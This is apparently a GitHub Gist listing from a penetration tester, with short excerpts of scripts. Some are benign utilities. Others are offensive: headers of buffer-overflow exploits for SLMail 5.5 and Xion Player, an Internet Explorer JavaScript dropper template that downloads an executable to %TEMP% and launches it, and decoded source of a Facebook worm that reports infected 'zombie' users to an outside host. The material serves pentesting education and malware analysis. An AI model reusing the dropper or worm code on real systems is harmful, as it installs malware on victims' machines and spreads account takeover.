Mariusz Banach mgeeky

  • Binary-Offensive.com
  • Poland
  • X @mariuszbit
@mgeeky
mgeeky / urlencoded2dict.py
Created March 31, 2016 12:31
Convert urlencoded string into dictionary (json)
import json
import re
def urlencoded2dict(txt):
    # Rewrite each key=value pair as a JSON member, drop the trailing comma, then parse.
    s = '{' + re.sub("([^=]+)=([^&]*)&?", r'"\1":"\2", ', txt) + '}'
    return json.loads(s.replace(', }', '}'))
@mgeeky
mgeeky / sshcommand.py
Created April 18, 2016 14:44
sshcommand.py - ripped out from Violent Python - by TJ O'Connor
#
# Pexpect driven SSH Command sending script.
# Based on:
# Violent Python, by TJ O'Connor
#
import pexpect
from sys import argv, exit
# pexpect treats these as regexes, so '$' must be escaped to match a literal shell prompt.
PROMPT = ['#', '>>>', '> ', r'\$ ']
@mgeeky
mgeeky / ajax_crawl.js
Last active May 5, 2016 15:38
AJAX Crawling bookmarklet - useful bookmarklet for fetching accessible, in-scope URLs from the webpage (and its sitemap.xml) in order to let them be captured in a local proxy like Burp. This in turn is useful for populating the local proxy's history and its website resources tree. Must-have during website pentesting.
/* Copy the below line to your bookmarklet: */
javascript:(function(){MAX_URLS_TO_FETCH = 512; limit_reached = false; function decodeHtml(html) {txt = document.createElement('textarea'); txt.innerHTML = html; return txt.value; } String.prototype.endsWith = function(suffix) {return this.indexOf(suffix, this.length - suffix.length) !== -1; }; function normalizeUri(uri) {if (!uri || uri.length < 1) {return ''; } if(uri.toLowerCase().startsWith('javascript:') || uri.toLowerCase().startsWith('mailto:') || uri.toLowerCase().startsWith('phone:') || uri.toLowerCase().startsWith('tel:') || uri.toLowerCase().startsWith('phone:') || uri.toLowerCase().startsWith('#') ) {return ''; } orig = location.origin; if (uri.startsWith('http') && !uri.startsWith(orig)) {if (uri.substr(uri.indexOf(':')).startsWith(orig.substr(orig.indexOf(':')))) {return uri; } return ''; } if (uri.startsWith(orig)) {return uri; } if (uri.startsWith('//')) {return location.protocol + uri; } if (uri.startsWith('"') || uri.startsWith("'") ) {return ''
@mgeeky
mgeeky / burp-curl-beautifier.py
Created August 11, 2016 14:40
Simple script for making "Copy as curl command" output in system's clipboard a little nicer, at least for me.
#!/usr/bin/python
#
# Simple script for making "Copy as curl command" output in system's clipboard a little nicer
# To use it:
# - firstly right click on request in BurpSuite
# - select "Copy as curl command"
# - then launch this script.
# As a result, you'll have a bit nicer curl command in your clipboard.
#
@mgeeky
mgeeky / slmail-dep-bypass-example.py
Last active August 12, 2016 02:21
Example of an old DEP Bypass technique on a SLMail 5.5 stack-based overflow
#
# Classic & old SLMail 5.5 PASS stack-based buffer overflow revisited for DEP Bypass
# via ROP to ZwSetInformationProcess with `leave`-based stack pivoting.
# Not overcoming ASLR, tested on Windows XP SP3 English.
#
# After launching, hit: $ nc victim 4444
#
# Prepared for educational purposes, if someone wants to go through first DEP Bypasses on
# this particular vulnerability.
#
@mgeeky
mgeeky / xion-1-unicode-exploit.py
Last active August 18, 2016 13:29
Xion Player (r2 studios) 1.0 121 build example of unicode-compatible venetian shellcode/exploit (Corelan.be Exploit Writing Tutorial, part 7)
#!/usr/bin/python
#
# Corelan.be Exploit Writing tutorial part 7. Unicode
# Example 1: r2 Studios Xion 1.0 121 build stack-based unicode overflow
#
# Example of unicode-compatible exploit.
# No ASLR compatible, no DEP either.
# Tested on Windows XP SP3.
#
@mgeeky
mgeeky / pastebin-upload.py
Last active August 21, 2016 13:31
Pastebin uploader. Just register global hotkey for it (like Win+Y) and have it upload code from clipboard and return URL.
#!/usr/bin/env python
#
# Simple bit-ly URL shortener.
# Usage:
# python bit-ly.py <URL>
# or by having a URL address in clipboard.
#
import bitly_api
from Tkinter import Tk
@mgeeky
mgeeky / backdoor-drop.js
Created September 8, 2016 10:20
Internet Explorer - JavaScript trojan/backdoor dropper template, to be used during Penetration Testing assessments
<script>
var SRC = "";
var CMDLINE = "";
var out = Math.random().toString(36).substring(7) + ".exe";
var axo = this.ActiveXObject;
var wshell = new axo("WScript.Shell");
var path = wshell.ExpandEnvironmentStrings("%TEMP%") + "/" + out;
var xhr = new axo("MSXML2.XMLHTTP");
xhr.onreadystatechange = function () {
@mgeeky
mgeeky / extract-vmlinux.sh
Created November 14, 2016 14:03
extract-vmlinux - Extract uncompressed vmlinux from a kernel image (source: https://raw.githubusercontent.com/torvalds/linux/master/scripts/extract-vmlinux )
#!/bin/sh
# ----------------------------------------------------------------------
# extract-vmlinux - Extract uncompressed vmlinux from a kernel image
#
# Inspired from extract-ikconfig
# (c) 2009,2010 Dick Streefland <dick@streefland.net>
#
# (c) 2011 Corentin Chary <corentin.chary@gmail.com>
#
# Licensed under the GNU General Public License, version 2 (GPLv2).
@mgeeky
mgeeky / svg-spammy.js
Last active November 30, 2016 13:27
(WIP) Decoded and refactored source code of an actively infecting Facebook worm, spreading via SVG attachments in the infected victim's PMs and via a malicious Chrome extension
function registerNewZombieUserAndStartFacebookInfection() {
    var y = new window.XMLHttpRequest;
    y.open("GET", "https://uye.io/php/start.php?ext=me&hash=" + hashParameter + "&user=" + username);
    y.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
    y.send();
    y.onreadystatechange = function () {
        if (4 == y.readyState && 200 == y.status) {
            var l = JSON.parse(y.responseText);
            config = l;
            console.log(config);